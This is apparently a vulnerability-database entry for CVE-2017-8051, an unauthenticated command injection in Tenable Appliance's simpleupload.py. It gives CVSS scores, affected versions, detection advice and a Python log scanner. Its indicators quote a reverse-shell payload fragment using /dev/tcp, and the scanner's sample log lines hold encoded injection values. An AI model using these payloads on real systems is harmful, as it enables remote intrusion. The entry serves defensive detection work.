CVE-2017-8051
published 2017-04-21


Priority P272 · critical · CVSS 3.0: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 16.48% (96.6th percentile)
Tenable Appliance 3.5 - 4.4.0, and possibly prior versions, contains a flaw in the simpleupload.py script in the Web UI. Through the manipulation of the tns_appliance_session_user parameter, a remote attacker can inject arbitrary commands.

Affected

11 ranges
Vendor | Product | Version range | Fixed in
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance
tenable | appliance

Detection & IOCs (extracted from sources)

path: /simpleupload.py
command: /dev/tcp/'$YOUR_IP'/'$LISTEN_PORT' 0>%261%0aecho '
  • Monitor HTTP requests to /simpleupload.py for manipulation of the `tns_appliance_session_user` parameter, particularly values containing shell metacharacters (e.g., `&`, `|`, `;`, `%26`, `%0a`) indicative of command injection.
  • Look for URL-encoded shell payloads in the `tns_appliance_session_user` parameter, specifically `%26` (ampersand) and `%0a` (newline) used to chain commands and establish reverse shells via `/dev/tcp`.
  • A public exploit for this RCE was published on 2017-04-18 by researcher 'agix'; treat any exploitation attempts against /simpleupload.py after this date as active in-the-wild exploitation.
  • All Tenable Appliance versions in the 3.x and 4.x lines are affected (3.4.0, 3.5.0, 3.5.1, 3.10.0, 3.10.1, 4.0.0, 4.1.0, 4.2.0, 4.3.0, 4.3.1, 4.4.0); the vulnerability is exploitable without authentication.
  • Tenable strongly recommends the appliance be placed on a non-Internet-addressable subnet to reduce exposure to this unauthenticated RCE.
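
The first two checks above, as an added Python example that is not part of the advisory or of any Tenable tooling, run over constructed access-log lines. It assumes the parameter is visible in the logged request URI; the log format, the addresses and the function name `suspicious_requests` are illustrative.

```python
import re
from urllib.parse import unquote_plus, urlsplit

PARAM = "tns_appliance_session_user"
TARGET = "/simpleupload.py"
# Shell metacharacters named in the guidance above, plus the /dev/tcp marker.
META = re.compile(r"[&|;\n]|/dev/tcp")
# Client address and request URI from a combined-format access-log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_requests(lines):
    """Return (client, decoded_value, matched_tokens) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, uri = m.groups()
        parts = urlsplit(uri)
        if not parts.path.endswith(TARGET):
            continue
        # Split on raw '&' first so an encoded %26 stays inside its value.
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            if unquote_plus(name) != PARAM:
                continue
            value = unquote_plus(raw)  # %0a -> newline, %26 -> '&'
            found = sorted(set(META.findall(value)))
            if found:
                hits.append((client, value, found))
    return hits

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Apr/2017:10:00:00 +0000] "GET /simpleupload.py?tns_appliance_session_user=admin HTTP/1.1" 200 512',
    '198.51.100.23 - - [18/Apr/2017:10:01:00 +0000] "POST /simpleupload.py?tns_appliance_session_user=a%0aecho+constructed HTTP/1.1" 200 0',
    '198.51.100.23 - - [18/Apr/2017:10:02:00 +0000] "POST /simpleupload.py?tns_appliance_session_user=a%26/dev/tcp/192.0.2.7/9 HTTP/1.1" 200 0',
    '192.0.2.10 - - [18/Apr/2017:10:03:00 +0000] "GET /index.html?q=a%26b HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value, found in suspicious_requests(SAMPLE_LOG):
        print(client, repr(value), found)
```

If the parameter travels in a POST body or a cookie, it will not appear in a standard access log; the same matching then has to run on proxy or WAF logs that record those fields.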

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C